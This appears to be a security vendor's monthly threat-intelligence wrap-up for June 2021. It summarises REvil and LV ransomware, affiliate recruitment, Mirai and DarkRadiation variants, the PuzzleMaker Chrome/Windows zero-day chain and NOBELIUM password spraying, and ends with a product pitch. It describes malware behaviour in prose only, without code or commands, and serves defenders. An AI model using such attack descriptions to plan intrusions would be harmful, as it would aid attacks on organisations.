June 2021 saw a number of ransomware attacks and ransom payments. Gold Northfield, the REvil ransomware group, launched various attacks targeting high-profile targets. JBS Foods, one of the world’s largest meat producers, paid the equivalent of $11 million to restore its operations in Australia, the USA, and Canada after being infected by REvil. Also Fujifilm fell victim to a ransomware attack by the REvil threat actors using the Qbot Trojan, as did Brazilian healthcare giant Grupo Fleury. The demand was $5 million to receive a way to decrypt its data and ensure that no stolen data would be leaked.
The popularity of REvil also has a shadow side for Gold Northfield. Threat actors started pirating ransomware to save time and resources. A tweaked version of the notorious REvil ransomware, dubbed LV ransomware, was detected in June. This new ransomware variant tracked and infected Windows machines with malicious binaries. The threat actors behind LV malware quite likely used a hex editor to remove potentially identifying characteristics from the binaries. Considering the hard-coded 2.02 version value and the unique REvil 2.03 code use, it looks like a beta version of REvil 2.03 was pirated for the LV ransomware. The malware linked to Tor-based ransom payment engines and each LV ransomware variant was unique, effectively preventing file decryption across multiple victims. It can be expected that the threat actors will market their LV ransomware as a RaaS.
In a previous wrap-up of the month, we mentioned that two prominent Russian-speaking cybercrime forums banned ransomware-related topics being posted. This forced threat actors to promote their service in another way. In June, we noticed that at least two ransomware gangs (LockBit and Himalaya, looking for recruiting hackers started using their own websites to advertise their encryption tools to attract new affiliates. The Himalaya ransomware group offered 70% commission for affiliates and advertised its configured and compiled FUD (Fully UnDetectable) file-encrypting malware.
We also saw new variants of the notorious MIRAI IoT malware hit the streets. The original source code was released to the general public in 2016. It did not take long for threat actors to grab this opportunity to create their own versions with the same structure and goal as the original. The MIRAI IoT malware detects IoT devices using default or weak usernames and passwords. By exploiting known and zero-day vulnerabilities for access, the malware then downloads and executes malicious binaries turning the infected device into part of a zombie network to execute Distributed Denial-of-Service (DDOS) attacks. The latest variants use unique strings or tokens in their binaries to verify whether e.g., SSH or Telnet commands were successfully executed in the device.
The newly discovered Bash ransomware became active in June using a fully implemented bash script in its attack chain. It looked like mainly Red Hat and CentOS Linux distributions were targeted. The worm and ransomware scripts also used the API of a popular messaging app for C&C communications. The api_attack directory contained various versions of the Bash ransomware, aka DarkRadiation, as well as the SSH worm responsible for spreading the ransomware. The scripts were successfully obfuscated i.e., with the open-source node-bash-obfuscate tool, which is a Node.js CLI tool and library to obfuscate bash scripts. The malware also checked if the configuration would allow SSH password/key-based attacks. SSH passwords and SSH keys were tested against the targeted IP address. Once the connection was made, the Bash malware started downloading and executing the ransomware on the infected systems using an install_tools function for installing the necessary. The messaging app’s API was also used to update the threat actors about the infection status.
Over the last few months, multiple companies were attacked by a group of threat actors, dubbed PuzzleMaker, who exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. It allowed remote attackers to execute arbitrary code in the sandbox via a crafted HTML page and to move it to the main system. By chaining the CVE-2021-31955 and CVE-2021-31956 vulnerabilities, the attackers were able to execute their malicious code on the targeted machine as follows:
- The stager verified that the exploit was successful.
- Once successful, the stager retrieved the dropper from the C&C server.
- The dropper was executed containing the Remote Shell feature.
- The stager and dropper started impersonating legitimate Windows files on the targeted machine.
- The payload was used to download and extract files/create system processes.
- The malware can also temporarily put itself to “sleep” or self-destruct.
We end this wrap-up with an update about the state-sponsored hacking group NOBELIUM (aka APT29, Cozy Bear, and The Dukes). These threat actors, responsible for the SolarWinds supply-chain attacks, conducted password spray and brute-force attacks in June to gain access to corporate networks via Microsoft customer support tools.
To find out if your organization is protected against the latest malware attacks, run Cymulate’s Immediate Threats assessment. This allows you to test and verify by yourself if your organization is exposed to these attacks. It also offers suggestions for mitigations in case it turns out that your organization is indeed vulnerable. Also, IOCs are available at the Cymulate UI!